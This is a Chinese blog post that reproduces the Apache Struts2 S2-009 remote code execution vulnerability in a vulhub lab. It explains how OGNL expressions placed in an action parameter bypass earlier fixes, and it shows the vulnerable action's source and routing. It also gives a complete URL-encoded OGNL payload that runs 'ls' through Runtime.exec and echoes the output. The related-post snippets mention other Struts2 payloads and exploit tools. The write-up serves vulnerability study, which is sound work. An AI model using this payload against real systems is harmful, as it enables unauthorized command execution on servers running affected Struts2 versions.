vulhub-structs2-S2-009 远程代码执行漏洞复现

于 2023-06-19 21:39:13 发布
阅读量255 收藏
点赞数
分类专栏: 漏洞复现 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/131295543
版权

漏洞描述

影响版本: 2.1.0 - 2.3.1.1

漏洞原理

Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.acton?example=<OGNL statement>&(example)('xxx')=1的方法来执行它,从而绕过官方对#\等特殊字符的防御。

Exp构造

测试环境是一个struts2的“功能展示”网站Struts Showcase,代码很多,我们的目标是去找一个接受了参数,参数类型是string的action。

先对S2-009.war进行解压(我用binwalk,其实直接zip就可以),可见源码都在WEB-INF/src目录中,我一般找ajax相关的代码,这些代码一般逻辑比较简单。

找到一个WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java

public class Example5Action extends ActionSupport {

    private static final long serialVersionUID = 2111967621952300611L;

    private String name;
    private Integer age;


    public String getName() { return name; }
    public void setName(String name) { this.name = name; }

    public Integer getAge() { return age; }
    public void setAge(Integer age) { this.age = age; }

    @Override
    public String execute() throws Exception {
        return SUCCESS;
    }
}

 

代码没有更简单了,其接受了name参数并调用setName将其赋值给私有属性this.name,正是符合我们的要求。然后去WEB-INF/src/java/struts-ajax.xml看一下URL路由:



```xml
<package name="ajax" extends="struts-default">
    ...
    <action name="example5" class="org.apache.struts2.showcase.ajax.Example5Action">
        <result name="input">/ajax/tabbedpanel/example5.jsp</result>
        <result>/ajax/tabbedpanel/example5Ok.jsp</result>
    </action>
    ...
</package>
```

name=example5,所以访问http://your-ip:8080/ajax/example5.action即可访问该控制器。按照原理中说到的方法,将OGNL利用代码放在name参数里,访问该URL:

`http://192.168.118.147:8080/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]`

下载的文件打开,看到命令执行成功

 

 有些人光是遇到就已经赚到了

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Struts2漏洞
2403_82795493的博客
02-20 2037
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
structs2最新远程执行漏洞S2-057、反序列化漏洞等修方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修方案
黑客Structs2漏洞利用工具超好用
07-18
黑客Structs2漏洞利用工具超好用,可以直接提交命令
buuctf [struts2]s2-009
qq_1873822的博客
03-22 369
漏洞描述 这个漏洞跟s2-003 s2-005 属于一套的。 Struts2对s2-003的修方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法
Struts2 S2-009
ZJT6666666的博客
12-21 193
Struts2 S2-009
墨者学院-Apache Struts2远程代码执行漏洞(S2-009)
JimWu的博客
09-04 1523
Apache Struts2远程代码执行漏洞(S2-009) 难易程度:★★ 题目类型:命令执行 使用工具:burpsuite、kali 漏洞原理:允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。 1.打开靶场,了解S2-009漏洞原理 2.构造poc,执行命令ls,查看文件。...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而对系统造成严重危害。 首先,s2-005漏洞(CVE-2012-0881)是2012年发的一个严重问题,它涉及到Struts2的OGNL(Object-Graph ...
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
E046-服务漏洞利用及加固-利用structs2实远程命令执行.pdf
12-02
本文将深入探讨一个安全漏洞的利用与加固,特别是如何利用Structs2框架中的漏洞远程命令执行。该课程以E046为主题,涵盖了网络安全领域的一个重要问题,即服务漏洞的利用和防御策略。我们将首先了解实验环境,...
typescriptify-golang-structs:Golang结构到TypeScript类的接口转换器
05-07
tscriptify -package=package/with/your/models -target=target_ts_file.ts Model1 Model2 如果需要在Typescript中导入自定义类型,则可以传递导入字符串: tscriptify -package=package/with/your/models -target...
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2366
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2;Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
漏洞----31、Struts2/S2-009
七天
06-29 527
文章目录一、漏洞原理二、环境搭建三、代码解释四、漏洞五、修方法 一、漏洞原理 Struts2对s2-003的修方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于#号,同样使用编码\u0023或\43进行绕过;于是Struts2对s2-005的修方法是禁止\等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.act
s2系列——s2-007,s2-008,s2-009
qq_54030686的博客
03-02 3376
s2-007,s2-008,s2-009 简而言之就是payload的输入,具体这里不再,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 8951
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
【vulhub】Structs2 S2-045 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 537
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
【vulhub】structs2远程代码执行漏洞 CVE-2017-9805(S2-052)
weixin_42884199的博客
12-06 506
前言 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5
Structs2系列漏洞 S2-001漏洞
weixin_43885355的博客
03-31 368
Structs2系列漏洞 S2-001漏洞 参考链接: https://blog.csdn.net/qq_29647709/article/details/84945159 0x01漏洞简介         该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{
java struts2 漏洞合集
whatday的专栏
08-31 4123
目录 一、S2-001 二、S2-005 三、S2-007 四、S2-008 五、S2-009 六、S2-012 七、S2-013 八、S2-015 九、S2-016 十、S2-045 十一、S2-048 十二、S2-052 十三、S2-053 十四、S2-057 十五、S2-019 十六、S2-devMode Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
lldpd-structs.h在sonic-buildimage的哪个目录下?
最新发布
05-30
在 Sonic 操作系统中,`lldpd-structs.h` 文件是在 `sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp` 目录下。因此,你需要前往 `sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp` 目录下查找 `lldpd-structs.h` 文件。你可以使用以下命令在 Sonic 操作系统中查找该文件: ``` cd sonic-mgmt/sonic-buildimage/packages/lldpd/files/usr/include/lldp ls lldpd-structs.h ``` 这将列出 `lldpd-structs.h` 文件是否存在于该目录中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值